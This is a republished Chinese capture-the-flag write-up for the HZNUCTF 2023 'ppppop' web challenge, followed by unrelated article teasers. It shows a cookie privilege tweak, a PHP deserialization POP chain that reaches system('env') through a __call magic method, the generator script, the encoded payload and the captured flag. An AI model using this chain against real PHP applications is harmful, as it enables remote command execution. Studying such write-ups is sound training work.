[HZNUCTF 2023 preliminary]ppppop

news2024/11/14 8:19:25

[HZNUCTF 2023 preliminary]ppppop

点进去之后是一片空白
接着我们打开HackBar 然后我们看到cookie里面有一个base64编码:

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

利用在线工具解码得到:
在这里插入图片描述

O:4:"User":1:{s:7:"isAdmin";b:0;}

由于序列化中的b代表着Boolean,所以我试着把0改为1。然后用在线工具加密得到:
在这里插入图片描述

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

将新的编码加入到cookies 中,然后运行之后发现有回显,是一串php代码:

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

接着我们对代码进行审计:

这段 PHP 代码定义了两个类 A 和 B,并包含了一些对用户输入进行处理的逻辑。整体来看,代码中可能存在安全风险,尤其是在处理用户输入的 payload 时进行反序列化操作。

以下是对代码的详细解读:

<?php
error_reporting(0);关闭 PHP 的错误报告。
include('utils.php');包含名为 utils.php 的文件。

class A {
    public $className;用于存储一个类名
    public $funcName;用于存储一个方法名
    public $args;用于存储传递给方法的参数。

    public function __destruct() {   这是 PHP 
    的析构函数,当对象被销毁时自动调用
        $class = new $this->className; 根据存储的
         className 创建一个新的对象 $class$funcName = $this->funcName;将存储的
         funcName 赋值给变量 $funcName$class->$funcName($this->args);
        调用新创建对象的指定方法,并传入存储的参数。
    }
}

class B {
    public function __call($func, $arg) {  这是
     PHP 的魔术方法,当调用一个不可访问的方法时自动触发。
        $func($arg[0]);
    }在这个方法中,它将第一个参数 $arg[0](即传入的参
    数数组中的第一个元素)作为参数传递给存储在变量 $func
     中的函数进行调用。
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    从用户提交的 POST 请求中获取 payload 参数 ,对其进行
     base64 解码,然后将结果反转。
    unserialize($payload);对处理后的 payload 进行反序列化操作。
}

然后我们反序列化构造pop链,通过A类来触发B类中的__call从而实现任意命令,执行后的回显在class B的__call 魔术方法里,我们需要让func和arg成为我们需要的变量。所以我们构造pop链如下:

<?php
error_reporting(0);
include('utils.php');
 
class A {
    public $className="B";
    public $funcName="system";
    public $args="env";
 
    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}
 
class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}
 
$a=new A();
echo(base64_encode(strrev(serialize($a))));
?>

利用在线工具运行php代码得到:
在这里插入图片描述

然后我们构造payload:

payload=fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw

post 传参,运行得到flag:
在这里插入图片描述由此得到本题flag:
NSSCTF{34f387cb-4c56-4282-aeee-fce453a11d94}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2082153.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

FreeRTOS实战项目CRTP协议移植(实现使用串口传输数据包)

文章目录 一、CRTP 协议①协议层次②端口分配 二、实现串口收发数据包2.1 数据包格式&#xff1a;2.2 如何传递数据包 三、CRTP处理数据过程3.1 CRTP处理数据流程示例&#xff1a;3.2 添加CRPT基本功能①链路初始化函数② CRTP层初始化③创建底层任务代码④ping服务⑤ 上机实验…

宝兰德多款仓颉开源项目获GitCode官方G-Star毕业认证,释放开发效率新动能

近日&#xff0c;由宝兰德基于仓颉编程语言开发的项目「Cangjie-TPC/redis-sdk」「Cangjie-TPC/hyperion」入驻GitCode平台&#xff0c;并获得GitCode官方优秀毕业项目认证&#xff0c;成为G-Star计划的一员&#xff0c;标志着宝兰德与GitCode将携手开启软件研发新纪元&#xf…

变频器会干扰补偿电容器正常工作吗

变频器&#xff08;VFD&#xff0c;Variable Frequency Drive&#xff09;可能会对补偿电容器的正常工作产生干扰。变频器工作时产生的谐波、快速开关操作和高频噪声都可能影响电容器的性能。 一、以下是变频器对补偿电容器可能产生的一些影响&#xff1a; 1、谐波干扰 谐波生…

JS基础之【基本数据类型与类型间的隐式显示转换】

&#x1f680; 个人简介&#xff1a;某大型国企高级前端开发工程师&#xff0c;7年研发经验&#xff0c;信息系统项目管理师、CSDN优质创作者、阿里云专家博主&#xff0c;华为云云享专家&#xff0c;分享前端后端相关技术与工作常见问题~ &#x1f49f; 作 者&#xff1a;码…

【Linux】初步识操作系统

linux专栏&#xff1a;《Linux入门系列》 系列文章&#xff1a;gdb-调试器初入门&#xff08;简单版使用&#xff09; 编辑器vim入门&#xff08;概念模式转换技巧&#xff09; 目录 1. 概念 2. 设计操作系统的目的 3. 定位&#xff1a;操作系统负责管理 4. 如何理解管理 …

Linux 数据结构 链表

1.段错误调试方法&#xff1a; 1.按照网上的方法配置Ubuntu&#xff0c;允许生成core文件 2.重新编译代码并加入-g选项(允许进行GDB调试) 3.ulimit -c unlimited 不限制core文件的生成的大小 4.执行代码,复现段错误,产生包含出错信息的core文件(检查cor…

呼叫系统怎么使用提高安全性

呼叫中心提高使用的安全性是一个综合性的任务&#xff0c;涉及技术、管理、人员等多个方面。以下是一些关键措施&#xff0c;旨在提升呼叫中心的安全性&#xff1a; 一、加强技术防护 1.数据加密&#xff1a;采用先进的加密技术对通话内容和数据传输进行加密&#xff0c;如使用…

浙大联合港中深发布AI医疗最新报告,全面审视「虚拟现实+人工智能」

想象一下&#xff0c;医生在手术前&#xff0c;通过虚拟现实技术&#xff0c;能够身临其境地预演手术过程&#xff0c;精确到每一个细节&#xff1b;患者则可以在VR环境中进行心理治疗&#xff0c;减轻焦虑与恐惧。 这一切&#xff0c;都得益于AI与VR的强强联手。 医学视觉增强…

今日分享丨微服务架构下查询数据缓存策略

引言 随着企业业务规模的扩大和复杂度的提升&#xff0c;微服务架构因其高可用性、可扩展性和易于维护的特性&#xff0c;逐渐成为现代软件开发的首选架构模式。然而&#xff0c;微服务架构带来的分布式特性也增加了数据访问的复杂性和延迟。特别是业务查询领域&#xff0c;一…

HIS系统成品|HIS系统搭建|医院HIS系统开发

在医疗信息化的浪潮中&#xff0c;医院信息系统&#xff08;HIS&#xff09;的开发功能分析成为关键。本文将探讨如何通过功能分析构建一个高效、智能的HIS系统&#xff0c;以满足现代医院的需求&#xff0c;并提升医疗服务质量。 1、HIS系统功能分析的必要性 在医疗行业中&am…

基于java的进销存管理系统设计与实现

需求分析 进销存主要是帮助商业企业全面有效管理采购、销售和库存&#xff0c;软件适用于需要进行采购管理&#xff0c;销售管理以及库存管理的所有商业企业。 进销存系统的产生和发展情况 进销存软件是一款通用性极强的商业企业进销存管理系统&#xff0c;软件囊括了商业企业…

第六届机器人与智能制造技术国际会议 (ISRIMT 2024)

重要信息 大会官网&#xff1a;www.isrimt.org&#xff08;点击了解大会&#xff0c;参会&#xff0c;投稿等信息&#xff09; 大会时间&#xff1a;2024年9月20-22日 大会地点&#xff1a;中国-江苏常州 收录检索&#xff1a;IEEE Xplore, EI Compendex, Scopus 大会简介…

航空公司名字趣史:看看有趣又有意义的命名背后有什么玄机

上周“东海航空”事件引发了东方航空在社交媒体上的一系列被迫营业&#xff0c;因为媒体的乌龙报道误将“东海航空”简称为“东航”&#xff0c;甚至直接用错了图片。众号&#xff1a;标猿公司起名 给公司起个好名字 其实除了大部分以地域、国家命名的航空公司&#xff0c;还…

Java 8 Optional用法【总结记录】

一、前言 这里引用书中描述来介绍Optional类&#xff1a; Optional是为核心类库设计的一个数据类型&#xff0c;用来替换null值。人们对原有的null值有很多抱怨&#xff0c;甚至连发明这一概念的Tony Hoare也是如此&#xff0c;他曾说这是自己的一个“价值连城的错误”。作为一…

cad导出图片格式怎么导出?5个软件帮助你快速转换文件格式

cad导出图片格式怎么导出&#xff1f;5个软件帮助你快速转换文件格式 将CAD文件导出为图片格式可以帮助你更方便地展示、分享或打印设计图纸。CAD&#xff08;Computer-Aided Design&#xff09;文件通常以DWG或DXF格式保存&#xff0c;而要将它们转换为常见的图片格式&#x…

NodeJS “次元高校”社团管理系统 ---附源码94897

摘要 计算机科学技术的飞速发展也更好地促进了高校信息化建设。为了适应新形势下更好地培养人才&#xff0c;高校在发展的过程中开始推进信息系统的建设。随着我国教育模式的不断改革和发展&#xff0c;越来越多的高校正在开展校园信息工程建设&#xff0c;以更好地提高高校的各…

C / C++内存管理

内存分布 1. 栈又叫堆栈--非静态局部变量/函数参数/返回值等等&#xff0c;栈是向下增长的。 2. 内存映射段是高效的I/O映射方式&#xff0c;用于装载一个共享的动态内存库。用户可使用系统接口创建共享共 享内存&#xff0c;做进程间通信&#xff0c;子进程堆区的开辟。 3. …

文心快码帮你解大厂面试题:TCP关闭连接的过程,为什么要4次挥手,为什么最大等待时间是2*MSL?

&#x1f50d;【大厂面试真题】系列&#xff0c;带你攻克大厂面试真题&#xff0c;秒变offer收割机&#xff01; ❓今日问题&#xff1a;在8g内存的机器&#xff0c;能否启动一个7G堆大小的java进程&#xff1f; ❤️一起看看文心快码Baidu Comate给出的答案吧&#xff01;如…

Oracle RAC 修改系统时区避坑指南(深挖篇)

大家好&#xff0c;这里是 Lucifer三思而后行&#xff0c;专注于提升数据库运维效率。 目录 前言环境安装问题重现时区检查修改时区问题分析问题解决 深究根源问题一问题二问题三 写在最后往期精彩文章推荐 前言 昨天遇到一个问题&#xff0c;Oracle RAC 安装完之后&#xff0…

bitsandbytes使用错误:CUDA Setup failed despite GPU being available

参考:https://huggingface.co/docs/bitsandbytes/main/en/installation 报错信息 ======================